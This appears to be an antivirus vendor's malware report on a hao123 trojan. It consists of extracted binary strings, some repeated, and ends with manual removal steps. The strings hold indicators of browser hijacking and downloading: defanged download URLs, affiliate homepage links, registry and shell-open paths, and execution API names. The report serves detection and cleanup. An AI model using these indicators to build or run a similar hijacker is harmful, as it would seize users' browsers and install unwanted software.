%d / %d]
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.1
hXXp://
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
%s,%d
%s.lnk
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetWindowsDirectoryA
WinExec
RegCreateKeyA
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
ShellExecuteA
SetWindowsHookExA
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
UrlA3n
.evsb?
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
RASAPI32.dll
WININET.dll
WINMM.dll
WS2_32.dll
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
@%s (%s:%d)
%s (%s:%d)
accKeyboardShortcut
@comctl32.dll
@comdlg32.dll
mfcm80u.dll
MSWHEEL_ROLLMSG
Chttp\shell\open\command
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\Internet Explorer\iexplore.exe
config.ini
\hao123.lnk
\config.ini
\hao123.exe
\uninstall.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.0
Hao123.exe
VVV.xxm4com. All rights reserved.
1.6.4.10
(*.*)
2012 - 2017
%original file name%.exe_3676_rwx_00401000_001D2000:
t$(SSh
~%UVW
u$SShe
hXXp://down.ku122.com/
\Local Settings\Application Data\hao123\config.ini
hXXp://VVV.ku122.com
\Local Settings\Application Data\hao123\hao123.exe
.text
`.rdata
@.data
.rsrc
@.reloc
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp
CCmdTarget
hhctrl.ocx
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
CNotSupportedException
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
mscoree.dll
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
.mixcrt
KERNEL32.DLL
GetProcessWindowStation
USER32.DLL
operator
OLEACC.dll
d:\code\zebra_proj\dt_proj\basic\Output\BinRelease\Hao123Proj.pdb
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
KERNEL32.dll
GetKeyState
SetWindowsHookExW
CreateDialogIndirectParamW
UnhookWindowsHookEx
USER32.dll
GetViewportExtEx
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GDI32.dll
comdlg32.dll
WINSPOOL.DRV
RegOpenKeyExW
RegDeleteKeyW
RegCloseKey
RegEnumKeyW
RegOpenKeyW
RegCreateKeyExW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
SHLWAPI.dll
oledlg.dll
ole32.dll
OLEAUT32.dll
.PAVCException@@
.PAVCMemoryException@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@
.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@
.PAVCFileException@@
.PAVCOleDispatchException@@
zcÁ
.?AVCCmdTarget@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>7%7s7
?$?(?,?0?4?8?<?@?
7074787<7@7
? ?$?(?0?
Thawte Certification1
hXXp://ocsp.thawte.com0
.hXXp://crl.thawte.com/ThawteTimestampingCA.crl0
hXXp://ts-ocsp.ws.symantec.com07
hXXp://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
hXXp://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
.Class 3 Public Primary Certification Authority0
<VeriSign Class 3 Public Primary Certification Authority - G50
hXXp://crl.verisign.com/pca3.crl0
hXXps://VVV.verisign.com/cps0
#hXXp://logo.verisign.com/vslogo.gif04
hXXp://ocsp.verisign.com0>
DhXXp://crl.microsoft.com/pki/crl/products/MicrosoftCodeVerifRoot.crl0
n.aAHu
2Terms of use at hXXps://VVV.verisign.com/rpa (c)101.0,
2Beijing baidu Netcom science and technology co.ltd1>0<
2Beijing baidu Netcom science and technology co.ltd0
/hXXp://csc3-2010-crl.verisign.com/CSC3-2010.crl0D
hXXps://VVV.verisign.com/rpa0
hXXp://ocsp.verisign.com0;
/hXXp://csc3-2010-aia.verisign.com/CSC3-2010.cer0
hXXps://VVV.verisign.com/cps0*
#hXXp://crl.verisign.com/pca3-g5.crl04
hXXp://ocsp.verisign.com0
\2345Soft\2345Explorer\2345Explorer.exe
hXXp://VVV.2345.com/?k5209809
\Tencent\QQBrowser\QQBrowser.exe
\liebao\liebao.exe
360se6\Application\360se.exe
hXXp://hao.360.cn/?src=lm&ls=n29ef8d0697
\Local Settings\Application Data\360Chrome\Chrome\Application\360chrome.exe
\Local Settings\Application Data\360Chrome\Chrome\Application\
anonymous@123.com
.exe|.rar|.zip|.gif|.jpg|.mp3|.rm
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
__MSVCRT_HEAP_SELECT
Broken pipe
Inappropriate I/O control operation
Operation not permitted
user32.dll
iphlpapi.dll
MPR.dll
VERSION.dll
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
(*.prn)|*.prn|
%d.%d
%d/%d
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
%d / %d
Bogus message code %d
libpng error: %s
libpng warning: %s
1.1.3
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\e5\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
HTTP/1.1
hXXp://
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
%s,%d
%s.lnk
c:\%original file name%.exe
#include "l.chs\afxres.rc" // Standard components
GetWindowsDirectoryA
WinExec
RegCreateKeyA
RegOpenKeyExA
RegCreateKeyExA
GetViewportOrgEx
ShellExecuteA
SetWindowsHookExA
CreateDialogIndirectParamA
InternetCanonicalizeUrlA
InternetCrackUrlA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Software\Microsoft\Windows\CurrentVersion\Policies\Network
Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32
ntdll.dll
%s%s.dll
@%s (%s:%d)
%s (%s:%d)
accKeyboardShortcut
@comctl32.dll
@comdlg32.dll
mfcm80u.dll
MSWHEEL_ROLLMSG
Chttp\shell\open\command
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
\Internet Explorer\iexplore.exe
config.ini
\hao123.lnk
\config.ini
\hao123.exe
\uninstall.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall
All Files (*.*)
No error message is available.'An unsupported operation was attempted.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else..An unexpected error occurred while reading %1..An unexpected error occurred while writing %1.
#Unable to load mail system support.
Access to %1 was denied..An invalid file handle was associated with %1.<%1 could not be removed because it is the current directory.6%1 could not be created because the directory is full.
Seek failed on A hardware I/O error was reported while accessing %1.0A sharing violation occurred while accessing %1.0A locking violation occurred while accessing %1.
Disk full while accessing %1..An attempt was made to access %1 past its end.
No error occurred.-An unknown error occurred while accessing %1./An attempt was made to write to the reading %1..An attempt was made to access %1 past its end.0An attempt was made to read from the writing %1.
1.0.0.0
Hao123.exe
VVV.xxm4com. All rights reserved.
1.6.4.10
(*.*)
SearchFilterHost.exe_1948:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610
iexplore.exe_3800:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
iexplore.exe_944:
.text
`.data
.rsrc
@.reloc
>.uzf
.us;}
IEFRAME.dll
MLANG.dll
iertutil.dll
urlmon.dll
ole32.dll
SHELL32.dll
SHLWAPI.dll
msvcrt.dll
USER32.dll
KERNEL32.dll
ADVAPI32.dll
RegOpenKeyExW
RegCloseKey
GetWindowsDirectoryW
_amsg_exit
_wcmdln
UrlApplySchemeW
PathIsURLW
UrlCanonicalizeW
UrlCreateFromPathW
iexplore.pdb
KEYW
KEYWh
KEYWD
.ENNNG.
a.ry.v
l.igM4
?1%SGf
xh.JW^
.97777"7" " " !
3.... ))
8888888888888
8888888888
.lPV)
úW1
.ApX/
H.ZAf
ð[U
%s!FK
1YYYY1YY9GEAA=77YRNNNW:.VT1
888777777
Y.hilkRROMLK=C,
..(((($$
3...((((%
3....(.''$
3.2...((((%
33.2....(,'
55323222...
(%&'00443445?
00.,,,4(
000.,,9(
0020..9(
003200;(
(#'( (''''!'!Microsoft.InternetExplorer.Default
user32.dll
Kernel32.DLL
xfire.exe
wlmail.exe
winamp.exe
waol.exe
sidebar.exe
psocdesigner.exe
np.exe
netscape.exe
netcaptor.exe
neoplanet.exe
msn.exe
mshtmpad.exe
mshta.exe
loader42.exe
infopath.exe
iexplore.exe
iepreview.exe
groove.exe
explorer.exe
dreamweaver.exe
contribute.exe
aol.exe
{28fb17e0-d393-439d-9a21-9474a070473a}Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
DShell32.dll
Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}"%s" %s
Kernel32.dll
\AppPatch\sysmain.sdb
-extoff go.microsoft.com/fwlink/?LinkId=106323
-extoff go.microsoft.com/fwlink/?LinkId=106322
-extoff go.microsoft.com/fwlink/?LinkId=106320
kernel32.dll
{00000000-0000-0000-0000-000000000000}\\?\Volume
shell:%s
Imaging_CreateWebPagePreview_Perftrack
Browseui_Tabs_Tearoff_BetweenWindows
Frame_URLEntered
Imaging_CreateWebPagePreview
WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421
SearchProtocolHost.exe_2840:
.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
hao123.exe:3776
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\hao123\config.ini (36 bytes)
C:\Users\"%CurrentUserName%"\Desktop\hao123导航.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\hao123\hao123.exe (1561 bytes)
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.